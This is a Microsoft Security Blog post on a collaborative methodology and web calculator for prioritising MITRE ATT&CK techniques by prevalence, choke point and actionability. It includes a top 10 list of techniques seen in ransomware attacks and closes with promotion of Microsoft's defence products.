The ATT&CK framework provides an extensive list of specific techniques that may be challenging to navigate in certain situations. This project aims to help defenders who use the framework focus on noteworthy techniques regardless of the attack scenario or environment. For example, using research on 22 ransomware attacks, the repeatable methodology led to the identification of the top 10 ransomware techniques list.

The project also included the development of a customizable, web-based calculator that seeks to prioritize techniques based on a defender’s input, making the methodology even easier to apply to different environments and scenarios. As an example of the insights that can be gained from using this calculator, the project found that the following techniques are present in most attacks and environments:

• Command & Scripting Interpreter (T1059)
• Scheduled Task/Job (T1053)
• Impair Defenses (T1562)
• Remote Services (T1021)
• Create or Modify System Process (T1543)

This methodology considers the continuing evolution of threats, so it supports the creation of criteria that are tailored to an organization’s unique environment. This enables defenders to continuously identify threat trends and decide where to focus resources for detection coverage.

Establishing the top ATT&CK techniques

The methodology for identifying the top ATT&CK techniques factored in three attributes to determine the significance of a technique: prevalence, choke point, and actionability.

Prevalence is the frequency of specific ATT&CK techniques used by attackers over time. A higher frequency of a technique indicates a higher likelihood of it being used in multiple attack scenarios. Therefore, there’s a higher chance of encountering an attack with a high prevalence ranking. Prevalence was determined using the Center’s Sightings Ecosystem project from April 2019 to July 2021, which registered 1.1 million encounters of attacks across the 184 unique ATT&CK techniques. Including prevalence as a criterion aims to cover more attacks with fewer techniques.

Choke points are techniques that disrupt an attacker due to them being a point of convergence or divergence. In real-world incidents, choke points manifest as one-to-many or many-to-one behaviors or steps in the attack. The inclusion of this criterion aims to identify the critical techniques that can help link activity throughout attack chains.

Actionability is the opportunity for a defender to detect or mitigate a technique. This is based on publicly available security controls (such as CIS Critical Security Controls and NIST 800-53 Security Controls) and analytics (Splunk detections, Elastic, and Sigma).

Top 10 techniques in ransomware attacks

Following the creation of the methodology, the top 10 ransomware techniques list was generated to test this new approach in practice. To create this list, Microsoft and the other partners involved in this collaborative effort analyzed prevalent ransomware attacks from the past three years. A total of 22 specific ransomware attacks were studied specifically for their use of ATT&CK techniques. Based on this research, the top 10 techniques in ransomware attacks are:

• Data Encrypted for Impact (T1486)
• Inhibit System Recovery (T1490)
• Obfuscated Files or Information (T1027)
• Windows Management Instrumentation (T1047)
• Masquerading (T1036)
• Command and Scripting Interpreter (T1059)
• Impair Defenses (T1562)
• Modify Registry (T1112)
• User Execution (T1204)
• Process Injection (T1055)

Organization-specific top techniques list via web calculator

This collaborative project also included the creation of a dynamic, user-friendly calculator for a more customizable, tailored top techniques list. This customizability allows organizations to have unique prioritization based on each organization’s size and maturity.

The calculator takes into consideration various inputs, including:

• NIST 800-53 Controls (all NIST controls or specific ones such as AC-2, CA-2, etc.)
• CIS Security Controls (all CIS Controls or specific ones such as 1.1, 2.5, etc.)
• Detection analytics (MITRE Cyber Analytics Repository, Elastic, Sigma, Splunk)
• Operating systems used in the environment
• Monitoring capabilities for network, process, file, and cloud services in the network

With this calculator, an organization can create a tailored technique list based on various aspects like the maturity of their security operations and the tools that they use. This can serve as a great starting point for companies looking to evaluate and improve their detection and protection capabilities regarding ransomware activities and prioritize the TTPs that are the most actionable for them.

Practical applications and future work

The methodology and insights from the top techniques list has many practical applications, including helping prioritize activities during triage. As it’s applied to more real-world scenarios, we can identify areas of focus and continue to improve our coverage on these TTPs and behaviors of prevalent threat actors. Refining the criteria can further increase results accuracy and make this project more customer-focused and more relevant for their immediate action. Improvements in the following areas can be of particular benefit:

• Fine-tuning the choke point analysis by adding machine learning models to visualize and predict all viable paths an attacker could take, which can be used to create a corresponding attack graph. This attack graph could be tied in with the user-implemented filters to identify relevant paths based on an organization’s current functionality. Future integration with the Attack Flow project might be a step towards this enhanced choke point analysis.
• Developing a metric to identify subjective filters like “Damage Impact” and “Significance” as they are important when making decisions on covering different attacks.
• Performing a comparison of results between this current analysis and global data sets to validate the accuracy of the current findings.
• Enhancing prevalence data to ensure a broad and timely data set is driving the analysis. Community contributions to the Sightings Ecosystem project is critical.

Insights from industry-wide collaborations like this project help enrich the protection that Microsoft provides for customers through solutions like Microsoft 365 Defender and Microsoft Sentinel. These solutions are further informed by trillions of signals that Microsoft processes every day, as well as our expert monitoring of the threat landscape. For example, our comprehensive view and research into the ransomware ecosystem enables us to deliver cross-domain defense against human-operated ransomware, leveraging a Zero Trust approach to limit the attack surface and minimize the chances of ransomware attacks succeeding. 

In the recent MITRE Engenuity ATT&CK® 2022 Evaluations, Microsoft demonstrated complete visibility and analytics on all stages of the attack chain, with 100% protection coverage, blocking all stages in early steps (pre-ransomware phase), including techniques within the top 10 ransomware techniques list that were tested.

This collaboration and innovation benefits everyone in the security community, not only those who use the MITRE ATT&CK framework as part of their products and services, but also our valued ecosystem of partners who build services on top of our platform to meet the unique needs of every organization, to advance threat-informed defense in the public interest. Microsoft is a research sponsor at the Center for Threat-Informed Defense, partnering to advance the state of the art in threat-informed defense in the public interest. One of our core principles at Microsoft is security for all, and we will continue to partner with MITRE and the broader community to collaborate on projects like this and share insights and intelligence.

Gierael Ortega, Alin Nagraj, Devin Parikh
Microsoft 365 Defender Research Team

The post Center for Threat-Informed Defense, Microsoft, and industry partners streamline MITRE ATT&CK® matrix evaluation for defenders appeared first on Microsoft Security Blog.